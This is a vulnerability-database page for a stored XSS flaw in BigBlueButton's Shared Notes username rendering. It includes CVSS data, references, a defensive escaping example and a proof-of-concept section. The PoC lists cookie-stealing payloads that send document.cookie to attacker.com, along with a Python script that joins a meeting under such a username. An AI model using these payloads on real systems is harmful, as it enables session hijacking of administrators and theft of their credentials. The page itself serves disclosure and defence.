Security Vulnerability Report
CVE-2025-55200 CVSS 7.1 HIGH

CVE-2025-55200

Published: 2025-10-09 19:15:44
Last Modified: 2025-10-20 15:30:19

Description

BigBlueButton is an open-source virtual classroom. In versions prior to 3.0.13, the "Shared Notes" feature contains a Stored Cross-Site Scripting (XSS) vulnerability with the input location being the "Username" field and the output location on the "Shared Notes" page, when a user with a malicious username is editing content. This vulnerability allows a low-privileged user to execute arbitrary JavaScript in the context of higher-privileged users (e.g., Admins) who open the Shared Notes page. Version 3.0.13 fixes the issue.
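An added illustration (not BigBlueButton or bbb-pads code) of the sink this record describes: a participant's display name interpolated verbatim into the Shared Notes author markup, beside the output-encoded form, plus a simple markup check a defender can run over join-request names. The rendering functions, the span markup and the sample name are assumptions, not taken from the project.

```javascript
// Added example for CVE-2025-55200; not code from BigBlueButton or bbb-pads.
// Assumption: the author label in Shared Notes is built by string
// interpolation into HTML, which is the pattern that turns a username into XSS.

// Characters that must be encoded before untrusted text is placed in HTML.
const HTML_ESCAPES = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
};

function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: the name goes in verbatim, so tag syntax in the
// username becomes live DOM in every other participant's browser.
function renderAuthorLabelUnsafe(name) {
  return `<span class="author">${name}</span>`;
}

// Fixed pattern: encode at the HTML sink. The name still displays exactly as
// typed, but the browser treats it as text rather than as markup.
function renderAuthorLabel(name) {
  return `<span class="author">${escapeHtml(name)}</span>`;
}

// Defender-side heuristic: flag display names carrying HTML tag syntax.
// Useful for alerting on join requests even after the rendering fix ships.
function looksLikeMarkup(name) {
  return /<[a-z!\/]/i.test(String(name));
}

// Constructed sample name shaped like the payloads quoted in this report.
const SAMPLE_NAME = '<img src=x onerror="alert(document.domain)">';

function demo() {
  return {
    unsafe: renderAuthorLabelUnsafe(SAMPLE_NAME),
    safe: renderAuthorLabel(SAMPLE_NAME),
    flagged: looksLikeMarkup(SAMPLE_NAME),
  };
}
```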

CVSS Details

CVSS Score (Secondary metric)
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
Primary metric
5.4 MEDIUM, CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Weakness
CWE-79

Configurations (Affected Products)

cpe:2.3:a:bigbluebutton:bigbluebutton:*:*:*:*:*:*:*:* - VULNERABLE
BigBlueButton < 3.0.13
bbb-pads < v1.5.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# PoC for CVE-2025-55200: BigBlueButton Stored XSS via Username field
# Vulnerability: Stored XSS in Shared Notes feature
# Attack Vector: Username field -> Shared Notes page rendering
#
# Step 1: Register or join a BigBlueButton meeting with a malicious username.
# The malicious username contains a JavaScript payload that will be stored.
#
# Malicious Username Payload Examples:
#   Payload 1: Simple cookie stealing
#     <script>fetch('http://attacker.com/steal?cookie='+document.cookie)</script>
#   Payload 2: Session hijacking via image tag
#     <img src=x onerror="new Image().src='http://attacker.com/log?c='+document.cookie">
#   Payload 3: SVG-based XSS
#     <svg/onload=alert('XSS-'+document.domain)>
#   Payload 4: Event handler based
#     <body onload="fetch('http://attacker.com/exfil',{method:'POST',body:document.cookie})">
#
# Step 2: Join the meeting and edit the Shared Notes.
# The malicious username will be rendered in the Shared Notes page.
#
# Step 3: When an admin or privileged user opens the Shared Notes page,
# the stored XSS payload executes in their browser context.
#
# Python example to automate joining with a malicious username.
import requests

TARGET = "https://bbb.example.com"
MEETING_ID = "random-meeting-id-12345"
ATTACKER_SERVER = "http://attacker.com/steal"

# Malicious username with XSS payload
malicious_username = f'<img src=x onerror="new Image().src=\'{ATTACKER_SERVER}?c=\'+document.cookie">'

# Join meeting API endpoint
join_url = f"{TARGET}/bigbluebutton/api/join"
params = {
    'fullName': malicious_username,
    'meetingID': MEETING_ID,
    'password': 'attendee-password',
    'joinURL': f"{TARGET}/bigbluebutton/api/join",
}

# Note: Actual API call would require proper checksum from BBB server
response = requests.get(join_url, params=params)
print(f"Joined meeting with malicious username: {malicious_username}")
print("Waiting for admin to open Shared Notes page...")
```

References

https://github.com/bigbluebutton/bigbluebutton/security/advisories/GHSA-9jv9-cjrm-grj2 (Vendor Advisory)
https://github.com/bigbluebutton/bigbluebutton/pull/23693 (Issue Tracking, Patch)
https://github.com/bigbluebutton/bbb-pads/pull/67 (Issue Tracking, Product)
https://github.com/bigbluebutton/bbb-pads/releases/tag/v1.5.4 (Release Notes)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-55200",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-09T19:15:43.663",
    "lastModified": "2025-10-20T15:30:19.377",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "BigBlueButton is an open-source virtual classroom. In versions prior to 3.0.13, the \"Shared Notes\" feature contains a Stored Cross-Site Scripting (XSS) vulnerability with the input location being the \"Username\" field and the output location on the \"Shared Notes\" page, when a user with a malicious username is editing content. This vulnerability allows a low-privileged user to execute arbitrary JavaScript in the context of higher-privileged users (e.g., Admins) who open the Shared Notes page. Version 3.0.13 fixes the issue."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 4.2
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          { "lang": "en", "value": "CWE-79" }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:bigbluebutton:bigbluebutton:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "3.0.13",
                "matchCriteriaId": "0AF3725E-941E-4C75-AA27-20DC97552948"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/bigbluebutton/bbb-pads/pull/67",
        "source": "[email protected]",
        "tags": ["Issue Tracking", "Product"]
      },
      {
        "url": "https://github.com/bigbluebutton/bbb-pads/releases/tag/v1.5.4",
        "source": "[email protected]",
        "tags": ["Release Notes"]
      },
      {
        "url": "https://github.com/bigbluebutton/bigbluebutton/pull/23693",
        "source": "[email protected]",
        "tags": ["Issue Tracking", "Patch"]
      },
      {
        "url": "https://github.com/bigbluebutton/bigbluebutton/security/advisories/GHSA-9jv9-cjrm-grj2",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}
```